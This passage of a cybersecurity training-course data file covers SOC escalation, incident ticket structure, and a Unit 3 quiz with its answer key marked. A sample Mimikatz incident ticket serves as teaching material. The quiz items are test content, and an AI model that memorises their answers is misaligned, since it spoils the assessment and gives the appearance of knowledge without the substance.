            'Record the name of the specific individual who accepted the handoff.',
          ],
        },
        knowledgeCheck: {
          dragDrop: {
            title: 'Arrange the Professional Escalation Sequence',
            instructions: 'Order the steps required to execute an emergency handoff to Tier 2 Incident Response.',
            items: [
              { id: 'esc-1', label: '1. Complete Initial Scoping and Verify True Positive Malicious Evidence', order: 1 },
              { id: 'esc-2', label: '2. Compile Detailed 5-W Dossier (Who, What, Where, When, Why)', order: 2 },
              { id: 'esc-3', label: '3. Execute Immediate Containment if Authorized (e.g. EDR Host Isolation)', order: 3 },
              { id: 'esc-4', label: '4. Initiate Verbal Voice Contact with On-Call Tier 2 Incident Commander', order: 4 },
              { id: 'esc-5', label: '5. Transfer Ticket Ownership and Log Status in Shift Passdown Sheet', order: 5 },
            ],
            explanation: 'A systematic escalation sequence guarantees both immediate containment and seamless transfer of analytical context.',
          },
          matching: {
            title: 'Match Communication Channels to Incident Scenarios',
            instructions: 'Connect each operational scenario with its required communication protocol.',
            pairs: [
              { id: 'comm-crit', left: 'Active Ransomware Outbreak (P1)', right: 'Immediate emergency phone bridge + verbal handoff' },
              { id: 'comm-high', left: 'Confirmed Trojan on Workstation (P2)', right: 'ITSM ticket escalation + direct responder notification' },
              { id: 'comm-shift', left: 'Shift Turnover Transition', right: 'Face-to-face or voice briefing + written passdown log' },
              { id: 'comm-tune', left: 'Detection Rule Tuning Request', right: 'Asynchronous engineering ticket with historical false positive stats' },
            ],
            explanation: 'Using the appropriate communication medium matches the urgency of the operational event.',
          },
        },
      },
      {
        id: 'topic-3-3',
        unitId: 'unit-3',
        title: 'Incident Ticketing Standards',
        order: 3,
        estimatedMinutes: 15,
        xpReward: 100,
        theory: {
          summaryLines: [
            'Security incident tickets serve as permanent legal, operational, and forensic records of a SOC investigation.',
            'Every ticket must stand on its own: an auditor, client, or forensic examiner should understand the incident 2 years later.',
            'Professional documentation strictly avoids vague jargon, emotional language, and uncorroborated assumptions.',
            'Tickets must detail the initial trigger, investigation chronology, evidence gathered, conclusion reached, and remediation steps taken.',
            'High-quality ticketing is the primary hallmark distinguishing amateur analysts from elite cybersecurity professionals.',
          ],
          knowMore: {
            title: 'NIST Incident Documentation and Reporting Standards',
            description: 'Guidance on retaining chain-of-custody documentation, ticket audit trails, and executive reporting standards.',
            externalUrl: 'https://csrc.nist.gov/',
            externalLabel: 'NIST Reporting Guidelines',
          },
        },
        demo: {
          title: 'Visual Story: Anatomy of a Flawless SOC Incident Ticket',
          subtitle: 'Examine the sections of a production-grade incident report from initial notification to ticket closure',
          steps: [
            {
              id: 1,
              stage: '1. Metadata Header',
              iconName: 'siem',
              title: 'Standardized Incident Header',
              description: 'Contains Incident ID, Category, Severity, Affected Assets, Assigned Analyst, and Dates.',
              telemetrySnippet: 'Ticket ID: INC-2026-08144\nTitle: Unauthorized Mimikatz Execution on HR-WS-02\nCategory: Credential Access (MITRE T1003)\nSeverity: HIGH (P2) | Status: CLOSED\nLead Analyst: Alex Mercer (L1)',
              highlightText: 'Clean headers enable rapid search and metric generation across thousands of tickets.',
            },
            {
              id: 2,
              stage: '2. Executive Summary',
              iconName: 'analyst',
              title: '2-Sentence High-Level Summary',
              description: 'Written in plain business English for non-technical managers and compliance officers.',
              telemetrySnippet: 'Executive Summary:\nOn September 29, 2026 at 14:12 UTC, a credential harvesting utility was executed on workstation HR-WS-02. The host was isolated via EDR within 8 minutes; forensic review confirmed zero credentials were successfully exfiltrated.',
              highlightText: 'Executives should understand the risk and resolution in 30 seconds.',
            },
            {
              id: 3,
              stage: '3. Technical Investigation Chronology',
              iconName: 'endpoint',
              title: 'Timestamped Chronology of Events',
              description: 'Step-by-step UTC timeline documenting every command executed, log reviewed, and action taken.',
              telemetrySnippet: 'Chronology (All times UTC):\n- 14:10:02: Phishing email delivered to m.smith@company.com\n- 14:12:15: User executed Resume.scr\n- 14:12:18: Mimikatz injected into lsass.exe (Sysmon Event 1)\n- 14:18:04: Host isolated from network via EDR\n- 14:24:00: Password reset completed for m.smith',
              highlightText: 'A solid timeline provides the backbone for legal and regulatory compliance.',
            },
            {
              id: 4,
              stage: '4. Evidence & IOC Table',
              iconName: 'server',
              title: 'Table of Indicators of Compromise (IOCs)',
              description: 'Clean list of all file hashes, malicious IPs, domains, and registry keys associated with the threat.',
              telemetrySnippet: 'IOC Table:\n- File Hash: a1b2c3d4e5... (SHA256) -> Mimikatz v2.2\n- IP Address: 198.51.100.42 (C2 Server)\n- Process Path: C:\\Users\\m.smith\\AppData\\Local\\Temp\\Resume.scr',
              highlightText: 'IOC tables allow threat hunters to sweep other enterprise databases instantly.',
            },
            {
              id: 5,
              stage: '5. Remediation & Closure Notes',
              iconName: 'analyst',
              title: 'Closure Verdict & Preventative Actions',
              description: 'Documents final disposition (True Positive), actions taken, and recommendations to prevent recurrence.',
              telemetrySnippet: 'Resolution: TRUE POSITIVE (Resolved & Contained)\nActions Taken:\n1. Host re-imaged with clean golden image\n2. User account credentials rotated\n3. Hash blocked fleet-wide in EDR\nRecommendations: Implement email gateway block for .scr attachments.',
              highlightText: 'Preventative recommendations ensure enterprise defenses continuously strengthen.',
            },
          ],
        },
        interactive: {
          title: 'Interactive Ticket Audit: Critique 4 Sample Incident Notes',
          scenario: 'Review each ticketing sample below. Determine whether it meets professional SOC documentation standards.',
          cards: [
            {
              id: 'tk-1',
              category: 'User',
              label: 'Sample A: "Closed as FP, user was just doing work"',
              summary: 'Contains zero technical logs, no user interview notes, no explanation of why the rule fired.',
              detailedFindings: 'FAIL. Completely unacceptable. If an auditor asks why this was closed, there is zero legal proof.',
              severityIndicator: 'Malicious',
            },
            {
              id: 'tk-2',
              category: 'Event ID',
              label: 'Sample B: Professional 5-W Documentation',
              summary: 'Details rule name, raw log line, user interview quote, change ticket number, and reason for closure.',
              detailedFindings: 'PASS. Flawless documentation that protects both the analyst and the organization during compliance audits.',
              severityIndicator: 'Normal',
            },
            {
              id: 'tk-3',
              category: 'Source IP',
              label: 'Sample C: Assumptions Stated as Facts',
              summary: '"Attacker probably gave up because they realized our firewall is too strong."',
              detailedFindings: 'FAIL. Never include personal speculation or emotional assumptions in official legal records.',
              severityIndicator: 'Suspicious',
            },
            {
              id: 'tk-4',
              category: 'Timeline',
              label: 'Sample D: Missing UTC Time Zone Designators',
              summary: 'Logs recorded as "3:15 PM" without stating whether it was EST, PST, or UTC.',
              detailedFindings: 'FAIL. Timestamps without explicit time zones make multi-source correlation impossible during post-incident audits.',
              severityIndicator: 'Suspicious',
            },
          ],
        },
        socContext: {
          title: 'Your Tickets May Be Subpoenaed in Court',
          scenario: 'During major ransomware and breach investigations, regulatory bodies (SEC, FTC, insurance underwriters) subpoena all SOC ticketing records.',
          analystMindset: 'Write every ticket with the assumption that a federal judge, cybersecurity lawyer, or C-suite executive will read your exact words.',
          bestPractices: [
            'State facts, not theories — "Event 4625 logged from 198.51.100.42", not "hacker tried to break in".',
            'Always use UTC timestamps formatted as YYYY-MM-DD HH:MM:SS UTC.',
            'Include the explicit remediation steps and verification of threat eradication before closing the ticket.',
          ],
        },
        knowledgeCheck: {
          dragDrop: {
            title: 'Arrange the Mandatory Sections of a SOC Incident Report',
            instructions: 'Order the sections of a production incident ticket from top to bottom.',
            items: [
              { id: 'sec-1', label: '1. Incident Header & Metadata (ID, Severity, Host, User, Analyst)', order: 1 },
              { id: 'sec-2', label: '2. Executive Summary (Non-technical 2-sentence business summary)', order: 2 },
              { id: 'sec-3', label: '3. Technical Investigation Chronology (Step-by-step UTC timeline)', order: 3 },
              { id: 'sec-4', label: '4. Evidence & IOC Table (File hashes, C2 IPs, domain records)', order: 4 },
              { id: 'sec-5', label: '5. Remediation Actions Taken & Preventative Recommendations', order: 5 },
            ],
            explanation: 'Structuring tickets consistently ensures clarity for technical responders, executives, and external compliance auditors alike.',
          },
          matching: {
            title: 'Match Ticket Sections to Their Required Information',
            instructions: 'Connect each section with its appropriate contents.',
            pairs: [
              { id: 'tkt-exec', left: 'Executive Summary', right: 'Plain-English non-technical impact overview for management' },
              { id: 'tkt-chrono', left: 'Technical Chronology', right: 'Timestamped UTC sequence of attacker activity and analyst actions' },
              { id: 'tkt-ioc', left: 'Indicators of Compromise Table', right: 'List of observed hashes, malicious IPs, and domain names' },
              { id: 'tkt-remed', left: 'Remediation & Closure', right: 'Verification of containment, host re-imaging, and preventative advice' },
            ],
            explanation: 'Rigorous documentation standards elevate security operations from chaotic firefights into repeatable engineering disciplines.',
          },
        },
      },
    ],
    assessment: {
      id: 'unit-3-assessment',
      title: 'Unit 3 Assessment: Severity, Escalation & Incident Documentation',
      passingScore: 80,
      xpReward: 200,
      questions: [
        {
          id: 'u3-q1',
          question: 'What factors determine the severity rating of a security incident?',
          options: [
            'How many words are in the alert name',
            'Business impact, asset criticality (e.g. Domain Controller vs test VM), and threat exploitability',
            'The time of day the analyst started their work shift',
            'Whether the alert rule was written in Python or PowerShell',
          ],
          correctAnswer: 1,
          explanation: 'Real severity reflects contextual risk: potential business loss, regulatory exposure, and asset criticality.',
        },
        {
          id: 'u3-q2',
          question: 'What is a "warm handoff" during an incident escalation?',
          options: [
            'Sending an email on Friday afternoon and leaving the office',
            'Active verbal communication and ticket synchronization confirming the recipient has accepted ownership',
            'Closing the ticket and opening a new one under a different name',
            'Turning up the heating in the server room',
          ],
          correctAnswer: 1,
          explanation: 'A warm handoff requires direct verbal confirmation that the incoming responder has assumed active responsibility.',
        },
        {
          id: 'u3-q3',
          question: 'Which timestamp standard must be used across all professional SOC incident notes?',
          options: [
            'Local workstation time with no time zone specified',
            'UTC (Coordinated Universal Time) with explicit time zone designators',
            'The time zone of the software vendor headquarters',
            'Approximate time (e.g. "sometime yesterday afternoon")',
          ],
          correctAnswer: 1,
          explanation: 'UTC eliminates ambiguities caused by daylight savings time and multi-regional enterprise infrastructure.',
        },
        {
          id: 'u3-q4',
          question: 'Why should incident tickets avoid emotional language or uncorroborated assumptions?',
          options: [
            'Because SIEM software cannot parse words with more than 6 letters',
            'Because tickets are permanent legal and audit documents that may be scrutinized in regulatory reviews or court',
            'Because emotional language makes the ticket file too large to save',
            'There is no reason; analysts should write whatever they feel',
          ],
          correctAnswer: 1,
          explanation: 'Incident notes are formal evidentiary records that must present objective facts and verified logs.',
        },
        {
          id: 'u3-q5',
          question: 'What information must be included in the Indicators of Compromise (IOC) section of a ticket?',
          options: [
            'A list of movies the analyst watched during the shift',
            'Specific hashes, IPs, domains, and process paths observed during the intrusion for fleet-wide hunting',
            'The personal phone numbers of all company employees',
            'Only the serial number of the monitor used by the analyst',
          ],
          correctAnswer: 1,
          explanation: 'IOC tables document the technical footprints of the attacker so threat hunters can sweep the entire fleet.',
        },
      ],
    },
  },
];
